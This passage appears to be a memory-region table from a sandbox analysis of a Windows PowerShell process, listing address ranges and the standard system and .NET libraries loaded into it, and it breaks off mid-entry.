Region: id = 2687 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2688 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2689 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2690 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2691 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2692 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2693 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2694 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2695 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2696 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2697 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2698 start_va = 0x7ffb116a0000 end_va = 0x7ffb116bdfff monitored = 0 entry_point = 0x7ffb116a3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2703 start_va = 0x7ffb1c980000 end_va = 0x7ffb1c9e7fff monitored = 1 entry_point = 0x7ffb1c984970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 2704 start_va = 0x5f0000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2705 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2706 start_va = 0x480000 end_va = 0x4b8fff monitored = 0 entry_point = 0x4812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2707 start_va = 0x740000 end_va = 0x8c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2708 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2709 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 2710 start_va = 0xa60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 2711 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2712 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2713 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 2714 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2715 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2716 start_va = 0x5f0000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2717 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 2718 start_va = 0x4a0000 end_va = 0x4a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2719 start_va = 0x7ffb187b0000 end_va = 0x7ffb18847fff monitored = 1 entry_point = 0x7ffb187b1000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 2720 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2721 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2722 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2723 start_va = 0x7ffb09400000 end_va = 0x7ffb09d8dfff monitored = 1 entry_point = 0x7ffb0952d9f0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 2724 start_va = 0x7ffb186b0000 end_va = 0x7ffb187a6fff monitored = 0 entry_point = 0x7ffb186d4d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 2729 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2730 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2731 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2732 start_va = 0x7ffaa9c80000 end_va = 0x7ffaa9c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9c80000" filename = "" Region: id = 2733 start_va = 0x7ffaa9c90000 end_va = 0x7ffaa9c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9c90000" filename = "" Region: id = 2734 start_va = 0x7ffaa9ca0000 end_va = 0x7ffaa9d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ca0000" filename = "" Region: id = 2735 start_va = 0x7ffaa9d30000 end_va = 0x7ffaa9d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9d30000" filename = "" Region: id = 2736 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2737 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2738 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 2739 start_va = 0x600000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2740 start_va = 0x660000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2741 start_va = 0x660000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2742 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2743 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2744 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 2745 start_va = 0x1e60000 end_va = 0x19e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 2746 start_va = 0x19e60000 end_va = 0x19ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000019e60000" filename = "" Region: id = 2747 start_va = 0x19ed0000 end_va = 0x19fdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000019ed0000" filename = "" Region: id = 2748 start_va = 0x19fe0000 end_va = 0x1a05ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000019fe0000" filename = "" Region: id = 2753 start_va = 0x1a060000 end_va = 0x1a396fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2758 start_va = 0x7ffb07f30000 end_va = 0x7ffb093f5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll") Region: id = 2759 start_va = 0x7df5ffe20000 end_va = 0x7df5ffebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007df5ffe20000" filename = "" Region: id = 2760 start_va = 0x7df5ffe10000 end_va = 0x7df5ffe1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007df5ffe10000" filename = "" Region: id = 2761 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2762 start_va = 0x1a3a0000 end_va = 0x1a47cfff monitored = 0 entry_point = 0x1a3fe0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2763 start_va = 0x1a3a0000 end_va = 0x1a42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a3a0000" filename = "" Region: id = 2764 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2769 start_va = 0x7ffb07310000 end_va = 0x7ffb07f23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cb0700ff6398b8e9d0d936cfc4894ba1\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\cb0700ff6398b8e9d0d936cfc4894ba1\\system.ni.dll") Region: id = 2778 start_va = 0x7ffb06980000 end_va = 0x7ffb07300fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\5290f26e6772518e2dd9d9c55bcc9a10\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\5290f26e6772518e2dd9d9c55bcc9a10\\system.core.ni.dll") Region: id = 2783 start_va = 0x7ffb18160000 end_va = 0x7ffb1820bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\8cf70b5e577ba82747ca2b8794282fc0\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pb378ec07#\\8cf70b5e577ba82747ca2b8794282fc0\\microsoft.powershell.consolehost.ni.dll") Region: id = 2784 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2785 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2786 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2787 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2792 start_va = 0x7ffaa9da0000 end_va = 0x7ffaa9ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9da0000" filename = "" Region: id = 2793 start_va = 0x7ffaa9de0000 end_va = 0x7ffaa9deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9de0000" filename = "" Region: id = 2957 start_va = 0x7ffb04970000 end_va = 0x7ffb06978fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\9d927f510e0c82ae9e818bc5d128b32d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.manaa57fc8cc#\\9d927f510e0c82ae9e818bc5d128b32d\\system.management.automation.ni.dll") Region: id = 2996 start_va = 0x1a3a0000 end_va = 0x1a401fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll") Region: id = 2997 start_va = 0x1a420000 end_va = 0x1a42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a420000" filename = "" Region: id = 3002 start_va = 0x620000 end_va = 0x624fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 3003 start_va = 0x630000 end_va = 0x63ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 3004 start_va = 0x7ffb28a30000 end_va = 0x7ffb28a37fff monitored = 0 entry_point = 0x7ffb28a310b0 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 3013 start_va = 0x7ffaa9df0000 end_va = 0x7ffaa9dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9df0000" filename = "" Region: id = 3019 start_va = 0x7ffb1c890000 end_va = 0x7ffb1c8dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\d0872fa26aa1d9eb9f0ec8fc2e3b99ee\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.numerics\\d0872fa26aa1d9eb9f0ec8fc2e3b99ee\\system.numerics.ni.dll") Region: id = 3028 start_va = 0x7ffb18610000 end_va = 0x7ffb186abfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\953b834c8f9245b900628eed76db0400\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.mf49f6405#\\953b834c8f9245b900628eed76db0400\\microsoft.management.infrastructure.ni.dll") Region: id = 3033 start_va = 0x7ffb040d0000 end_va = 0x7ffb04969fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\system.xml.ni.dll") Region: id = 3038 start_va = 0x7ffb0e330000 end_va = 0x7ffb0e491fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\8357be8fc3a91df0478792b54d6b8798\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.dired13b18a9#\\8357be8fc3a91df0478792b54d6b8798\\system.directoryservices.ni.dll") Region: id = 3043 start_va = 0x7ffb0e1d0000 end_va = 0x7ffb0e32efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\fccecea4442e013d0d6a41b1bb69289b\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.management\\fccecea4442e013d0d6a41b1bb69289b\\system.management.ni.dll") Region: id = 3055 start_va = 0x7ffaa9e00000 end_va = 0x7ffaa9e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e00000" filename = "" Region: id = 3064 start_va = 0x7ffaa9e10000 end_va = 0x7ffaa9e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e10000" filename = "" Region: id = 3069 start_va = 0x7ffaa9e20000 end_va = 0x7ffaa9e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e20000" filename = "" Region: id = 3078 start_va = 0x7ffaa9e30000 end_va = 0x7ffaa9e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e30000" filename = "" Region: id = 3080 start_va = 0x7ffaa9e40000 end_va = 0x7ffaa9e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e40000" filename = "" Region: id = 3088 start_va = 0x7ffaa9e50000 end_va = 0x7ffaa9e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e50000" filename = "" Region: id = 3093 start_va = 0x7ffaa9e60000 end_va = 0x7ffaa9e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e60000" filename = "" Region: id = 3094 start_va = 0x7ffaa9e70000 end_va = 0x7ffaa9e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e70000" filename = "" Region: id = 3103 start_va = 0x7ffaa9e80000 end_va = 0x7ffaa9e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e80000" filename = "" Region: id = 3105 start_va = 0x7ffaa9e90000 end_va = 0x7ffaa9e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e90000" filename = "" Region: id = 3113 start_va = 0x7ffaa9ea0000 end_va = 0x7ffaa9eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ea0000" filename = "" Region: id = 3118 start_va = 0x7ffaa9eb0000 end_va = 0x7ffaa9ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9eb0000" filename = "" Region: id = 3123 start_va = 0x7ffaa9ec0000 end_va = 0x7ffaa9ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ec0000" filename = "" Region: id = 3140 start_va = 0x7ffb1e090000 end_va = 0x7ffb1e0bbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Confe64a9051#\\42943626d3f64ac07cc966bb54506ab5\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.confe64a9051#\\42943626d3f64ac07cc966bb54506ab5\\system.configuration.install.ni.dll") Region: id = 3144 start_va = 0x7ffb0e0f0000 end_va = 0x7ffb0e1c6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\aa72dbe028c273873c1324bb840af088\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.transactions\\aa72dbe028c273873c1324bb840af088\\system.transactions.ni.dll") Region: id = 3146 start_va = 0x7ffb182c0000 end_va = 0x7ffb1830cfff monitored = 1 entry_point = 0x7ffb182dfe9a region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3147 start_va = 0x1a430000 end_va = 0x1a47afff monitored = 1 entry_point = 0x1a44fe9a region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3169 start_va = 0x7ffb1cb90000 end_va = 0x7ffb1cb94fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.diagnostics.tracing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Diagd2d95910#\\47993f93edc5c35a90f5fdcd8935bee5\\System.Diagnostics.Tracing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.diagd2d95910#\\47993f93edc5c35a90f5fdcd8935bee5\\system.diagnostics.tracing.ni.dll") Region: id = 3175 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3176 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3177 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3178 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3182 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3183 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3184 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 3185 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3187 start_va = 0x6e0000 end_va = 0x6e8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3190 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3191 start_va = 0x6e0000 end_va = 0x6e8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3192 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3193 start_va = 0x6e0000 end_va = 0x6e8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3199 start_va = 0x1a430000 end_va = 0x1a4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a430000" filename = "" Region: id = 3200 start_va = 0x1a4b0000 end_va = 0x1a52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a4b0000" filename = "" Region: id = 3210 start_va = 0x7ffaa9ed0000 end_va = 0x7ffaa9edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ed0000" filename = "" Region: id = 3214 start_va = 0x7ffaa9ee0000 end_va = 0x7ffaa9eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ee0000" filename = "" Region: id = 3219 start_va = 0x7ffb0e640000 end_va = 0x7ffb0e744fff monitored = 1 entry_point = 0x7ffb0e64107c region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 3220 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3225 start_va = 0x1a530000 end_va = 0x1a62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a530000" filename = "" Region: id = 3229 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3230 start_va = 0x7ffaa9ef0000 end_va = 0x7ffaa9efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ef0000" filename = "" Region: id = 3233 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3242 start_va = 0x7ffb0e5d0000 end_va = 0x7ffb0e631fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = 